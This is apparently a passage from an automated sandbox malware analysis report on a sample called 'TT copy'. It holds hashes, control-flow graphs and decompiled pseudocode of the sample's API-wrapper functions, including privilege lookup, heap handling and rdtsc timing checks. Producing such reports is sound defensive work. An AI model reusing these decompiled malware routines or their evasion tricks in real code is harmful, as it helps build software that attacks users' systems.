                                                                                                            • Opcode ID: 169bc08cab051df3b68c302875e9084d176cc377ff5a40680c05208dcd46e8bb
                                                                                                            • Instruction ID: 69b4087329dc9fcbe53ffe1ec60ca68cdb8e413c1262f91df158e504e48e2dc0
                                                                                                            • Opcode Fuzzy Hash: 169bc08cab051df3b68c302875e9084d176cc377ff5a40680c05208dcd46e8bb
                                                                                                            • Instruction Fuzzy Hash: 2590026160100543418071A9C8849468105FBE1255751C131A0D88550DC599986567A5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 42a481b5cbd3a462e1ec05b92a3e00d0f883c824a409d949071e8b4ebd762533
                                                                                                            • Instruction ID: eca928b050e3845e19a39da83047f61e3e13e9f5b768abc4fa8269a6d5ce49ee
                                                                                                            • Opcode Fuzzy Hash: 42a481b5cbd3a462e1ec05b92a3e00d0f883c824a409d949071e8b4ebd762533
                                                                                                            • Instruction Fuzzy Hash: B290026121180543D24065A98C54B474105E7D0347F51C125A0544554CC95598616661
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 390471051b62af089c5b932e802e2e9d5e7681fb36d3ef79262c347e6d1f6f17
                                                                                                            • Instruction ID: 2dc5d94eff62656b207c47b7b319660fdcb026bb90dc74c4ec989dff475ae814
                                                                                                            • Opcode Fuzzy Hash: 390471051b62af089c5b932e802e2e9d5e7681fb36d3ef79262c347e6d1f6f17
                                                                                                            • Instruction Fuzzy Hash: 74900475311005030145F5DD47445474147F7D53D5351C031F1405550CD771DC717371
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 159cb15761a520992a512cb649e146ba7fd63a91ac3c952106d0eae63bab68b8
                                                                                                            • Instruction ID: b663a9abbd8d5de1eaebef70c063996db42f31aee4399bdb7346eff591beb5bf
                                                                                                            • Opcode Fuzzy Hash: 159cb15761a520992a512cb649e146ba7fd63a91ac3c952106d0eae63bab68b8
                                                                                                            • Instruction Fuzzy Hash: C69002A120200503414571998454656810AE7E0245B51C031E1404590DC56598917265
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 5b8406bcf68f3ff691abdc8bef45c09a3ce44396d91ec36e44170d7dcc43fd5f
                                                                                                            • Instruction ID: 30504a350be699a03dc1527b1d3d108a73d0fe55b07905047e997c1a2dd6c43e
                                                                                                            • Opcode Fuzzy Hash: 5b8406bcf68f3ff691abdc8bef45c09a3ce44396d91ec36e44170d7dcc43fd5f
                                                                                                            • Instruction Fuzzy Hash: 6090027120100903D14065D994486864105E7E0345F51D021A5414555EC6A598917271
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 15d60e2d50952a0f858a32f2779d353257df4310ad85969b4874ee7ac31156f8
                                                                                                            • Instruction ID: a862e29af7f023698c12ac0925b18d653de49a7bc7c1d1a493d8f587176f3ad4
                                                                                                            • Opcode Fuzzy Hash: 15d60e2d50952a0f858a32f2779d353257df4310ad85969b4874ee7ac31156f8
                                                                                                            • Instruction Fuzzy Hash: 1F90026921300503D1C07199944864A4105E7D1246F91D425A0405558CC95598696361
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A97A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 25cdb727cc1920d774a5c49ced5205d747f5f06cfbfa911ed2459f9e0b9c5993
                                                                                                            • Instruction ID: 294b46ed2582126cbeca27fdc52ff301d9ced3d556758448fa962004d69a85fb
                                                                                                            • Opcode Fuzzy Hash: 25cdb727cc1920d774a5c49ced5205d747f5f06cfbfa911ed2459f9e0b9c5993
                                                                                                            • Instruction Fuzzy Hash: C590026130100503D180719994586468105F7E1345F51D021E0804554CD95598566362
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: d2b1b0684ae816e35178454e17b12b8f874ddf088f0a5e2ab72b905b6d8ec422
                                                                                                            • Instruction ID: 7d104c3044268d531082426cc3a59a3bf889896d08435ed38f4986b79259df4a
                                                                                                            • Opcode Fuzzy Hash: d2b1b0684ae816e35178454e17b12b8f874ddf088f0a5e2ab72b905b6d8ec422
                                                                                                            • Instruction Fuzzy Hash: E390027131114903D1506199C4447464105E7D1245F51C421A0C14558DC6D598917262
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A9660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 9d703acb30a8dd681fd758a43e64fb6afe958e42a2834d8a749068298b41e98f
                                                                                                            • Instruction ID: 460d953c3a14525b02ddbce5bf5ca4b2558676eb373be86b4303074c90136da4
                                                                                                            • Opcode Fuzzy Hash: 9d703acb30a8dd681fd758a43e64fb6afe958e42a2834d8a749068298b41e98f
                                                                                                            • Instruction Fuzzy Hash: 4290027120100D03D1C07199844468A4105E7D1345F91C025A0415654DCA559A5977E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010A96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID:
                                                                                                            • API String ID: 2994545307-0
                                                                                                            • Opcode ID: 73eb6a7763255f9e926b609f63404b8e19b68cba36dde456f39dec7303dde0d2
                                                                                                            • Instruction ID: 9e40a6bc7a6fa6fca370ec88cd4995cf85aa35dc0a60af3b5845584be024c12c
                                                                                                            • Opcode Fuzzy Hash: 73eb6a7763255f9e926b609f63404b8e19b68cba36dde456f39dec7303dde0d2
                                                                                                            • Instruction Fuzzy Hash: 3190027120108D03D1506199C44478A4105E7D0345F55C421A4814658DC6D598917261
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00408EE0 Relevance: .1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E00408EE0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* __edi;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t47;
				intOrPtr* _t49;
				void* _t50;
				void* _t51;
				void* _t52;
				void* _t53;

				_t49 = _a4;
				_t39 = 0; // executed
				_t24 = E00407220(_t49,  &_v24); // executed
				_t51 = _t50 + 8;
				if(_t24 != 0) {
					_t40 =  &_v840;
					E00407430( &_v24,  &_v840);
					_t52 = _t51 + 8;
					_push(_t47);
					do {
						E0041BF40(_t40, _t47,  &_v284, 0x104);
						_t40 =  &_v804;
						E0041C5B0( &_v284,  &_v804);
						_t53 = _t52 + 0x10;
						_t47 = 0x4f;
						while(1) {
							_t31 = E00415A50(_t40, __eflags, E004159F0(_t49, _t47),  &_v284);
							_t53 = _t53 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - 0x62;
							if(_t47 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E00407460( &_v24,  &_v840);
							_t52 = _t53 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t49 + 0x18; // 0x5e14c483
						_t40 =  *_t9;
						_t10 = _t49 + 0x478;
						 *_t10 =  *(_t49 + 0x478) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E004074E0(_t49,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t49 + 0x560;
						 *_t16 =  *(_t49 + 0x560) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t49 + 0x35)) =  *((intOrPtr*)(_t49 + 0x35)) + _t39;
					_t20 = _t49 + 0x35; // 0xffff43e8
					_t21 = _t49 + 0x36;
					 *_t21 =  *(_t49 + 0x36) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}




















                                                                                                            0x00408eeb
                                                                                                            0x00408ef3
                                                                                                            0x00408ef5
                                                                                                            0x00408efa
                                                                                                            0x00408eff
                                                                                                            0x00408f07
                                                                                                            0x00408f12
                                                                                                            0x00408f17
                                                                                                            0x00408f1a
                                                                                                            0x00408f20
                                                                                                            0x00408f2c
                                                                                                            0x00408f31
                                                                                                            0x00408f3f
                                                                                                            0x00408f44
                                                                                                            0x00408f47
                                                                                                            0x00408f50
                                                                                                            0x00408f62
                                                                                                            0x00408f67
                                                                                                            0x00408f6a
                                                                                                            0x00408f6c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00408f6e
                                                                                                            0x00408f6f
                                                                                                            0x00408f72
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00408f74
                                                                                                            0x00408f81
                                                                                                            0x00408f8c
                                                                                                            0x00408f91
                                                                                                            0x00408f94
                                                                                                            0x00408f96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00408f96
                                                                                                            0x00408f76
                                                                                                            0x00408f76
                                                                                                            0x00408f79
                                                                                                            0x00408f79
                                                                                                            0x00408f79
                                                                                                            0x00408f7f
                                                                                                            0x00000000
                                                                                                            0x00408f98
                                                                                                            0x00408f98
                                                                                                            0x00408f98
                                                                                                            0x00408f9c
                                                                                                            0x00408fa1
                                                                                                            0x00408faa
                                                                                                            0x00408fac
                                                                                                            0x00408fae
                                                                                                            0x00408fb4
                                                                                                            0x00408fb8
                                                                                                            0x00408fbb
                                                                                                            0x00408fbb
                                                                                                            0x00408fbb
                                                                                                            0x00408fbb
                                                                                                            0x00408fc2
                                                                                                            0x00408fc5
                                                                                                            0x00408fca
                                                                                                            0x00408fca
                                                                                                            0x00408fca
                                                                                                            0x00408fd7
                                                                                                            0x00408f06
                                                                                                            0x00408f06
                                                                                                            0x00408f06

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                                                                                            • Instruction ID: 2340baedcf14a887bbc52fd8c81bbc6006bef37b01405f1af93c5312fbc60911
                                                                                                            • Opcode Fuzzy Hash: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                                                                                            • Instruction Fuzzy Hash: BB214EB2D4010957CB20D6709D41EFB73AC9F50308F44057FF989A3181FA38BB4987A6
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00407690 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 206 407690-4076da call 41bf90 call 41cb70 call 40a150 call 415ab0 215 4076dc-4076ee PostThreadMessageW 206->215 216 40770e-407712 206->216 217 4076f0-40770a call 4098b0 215->217 218 40770d 215->218 217->218 218->216
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00407690(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BF90( &_v67, 0, 0x3f);
				E0041CB70( &_v68, 3);
				_t12 = E0040A150(_a4 + 0x20,  &_v68); // executed
				_t13 = E00415AB0(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004098B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}











                                                                                                            0x0040769f
                                                                                                            0x004076a3
                                                                                                            0x004076ae
                                                                                                            0x004076be
                                                                                                            0x004076ce
                                                                                                            0x004076d3
                                                                                                            0x004076da
                                                                                                            0x004076dd
                                                                                                            0x004076ea
                                                                                                            0x004076ec
                                                                                                            0x004076ee
                                                                                                            0x0040770b
                                                                                                            0x0040770b
                                                                                                            0x00000000
                                                                                                            0x0040770d
                                                                                                            0x00407712

                                                                                                            APIs
                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076EA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1836367815-0
                                                                                                            • Opcode ID: 33cc3d8823da0739b712ff51f58ed140dca0fa62c918e370dea6f1795a206453
                                                                                                            • Instruction ID: cf4610ad131e10875976ef5617329bc6f707545325555e817fd5ed13dbd1b96a
                                                                                                            • Opcode Fuzzy Hash: 33cc3d8823da0739b712ff51f58ed140dca0fa62c918e370dea6f1795a206453
                                                                                                            • Instruction Fuzzy Hash: C701AC31A8031876E721A6D59C43FFF775C5B45B54F04411AFF04BA2C1D6A8790547EA
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A784 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 248 41a784-41a7aa call 41af70 251 41a7af-41a7c4 LookupPrivilegeValueW 248->251
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E0041A784(void* __eax, void* __edi, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
				int _t13;

				asm("aaa");
				0x5573066e();
				_t10 = _a8;
				E0041AF70( *((intOrPtr*)(_a8 + 0xa1c)), _t10, _t10 + 0xca8,  *((intOrPtr*)(_a8 + 0xa1c)), 0, 0x46);
				_t13 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
				return _t13;
			}




                                                                                                            0x0041a787
                                                                                                            0x0041a78c
                                                                                                            0x0041a793
                                                                                                            0x0041a7aa
                                                                                                            0x0041a7c0
                                                                                                            0x0041a7c4

                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5D2,0040D5D2,00000041,00000000,?,00409195), ref: 0041A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: de83731c1455f185018388e51831f11ab45e29bc4ef2835cf13229835070add5
                                                                                                            • Instruction ID: 0a80a0a6db0c697a821da119e56f01a0964c46d907043f619a5c95fd19a3fb1b
                                                                                                            • Opcode Fuzzy Hash: de83731c1455f185018388e51831f11ab45e29bc4ef2835cf13229835070add5
                                                                                                            • Instruction Fuzzy Hash: E7E092B53002086FDF10DFA9CC49EEB3769DF84664F014165FD485B245C931F85586F1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A5F0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 252 41a5f0-41a621 call 41af70 RtlAllocateHeap
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A5F0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                            0x0041a607
                                                                                                            0x0041a61d
                                                                                                            0x0041a621

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00415196,?,0041590F,0041590F,?,00415196,?,?,?,?,?,00000000,00409123,?), ref: 0041A61D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                                                                            • Instruction ID: a902bd2471d7bf624e41e955d84fd9d1c4f3b9c17a63ece7231003dd0180069e
                                                                                                            • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                                                                            • Instruction Fuzzy Hash: 9DE01AB52002046BDB14DF89DC45E9737ACAF88654F018155BA085B241C530F9108AB5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 255 41a630-41a661 call 41af70 RtlFreeHeap
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A630(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                            0x0041a63f
                                                                                                            0x0041a647
                                                                                                            0x0041a65d
                                                                                                            0x0041a661

                                                                                                            APIs
                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409123,?,?,00409123,00000060,00000000,00000000,?,?,00409123,?,00000000), ref: 0041A65D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 3298025750-0
                                                                                                            • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                                                                            • Instruction ID: 7f623aad187af7064e7533bd75938f2c26ac04ae0faa765159e468c107c5f902
                                                                                                            • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                                                                            • Instruction Fuzzy Hash: 6EE012B5200208ABDB14EF89DC49EA737ACAF88764F118159BA085B252C630E9208AB1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 258 41a790-41a7a9 259 41a7af-41a7c4 LookupPrivilegeValueW 258->259 260 41a7aa call 41af70 258->260 260->259
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A790(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF70( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                            0x0041a7aa
                                                                                                            0x0041a7c0
                                                                                                            0x0041a7c4

                                                                                                            APIs
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5D2,0040D5D2,00000041,00000000,?,00409195), ref: 0041A7C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3899507212-0
                                                                                                            • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                                                                            • Instruction ID: 06e833523edb0ad7648b3b81e76834ac107786c1f02646ed6da31cb29cb4c049
                                                                                                            • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                                                                                            • Instruction Fuzzy Hash: E7E01AB52002086BDB10DF89CC45EE737ADAF89664F018155BA0857241C530E8158AB5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E0041A670(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041AF70( *((intOrPtr*)(_a4 + 0xa18)), _t5, _t5 + 0xc98,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                            0x0041a673
                                                                                                            0x0041a68a
                                                                                                            0x0041a698

                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.352260346.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_TT copy.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                                                                            • Instruction ID: dff2ff55e3f6aa1d663a1a6c4130c6e76ef78379950388b0c84fd9bb2fd8c8d7
                                                                                                            • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                                                                                            • Instruction Fuzzy Hash: F8D017766002187BD620EB99CC89FD777ACDF457A4F0180A5BA0C6B242C934BA5187E1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0041A622 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 16%
                                                                                                            			E0041A622(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t12;

				_pop(es);
				asm("loope 0x70");
				0x4da2c5f4();
				asm("salc");
				_t9 = _a4;
				_t3 = _t9 + 0xc90; // 0xc90
				E0041AF70( *((intOrPtr*)(_a4 + 0x14)), _t9, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}




                                                                                                            0x0041a622
                                                                                                            0x0041a623
                                                                                                            0x0041a625
                                                                                                            0x0041a62c
                                                                                                            0x0041a633
                                                                                                            0x0041a63f
                                                                                                            0x0041a647
                                                                                                            0x0041a65d
                                                                                                            0x0041a661

                                                                                                            APIs
                                                                                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
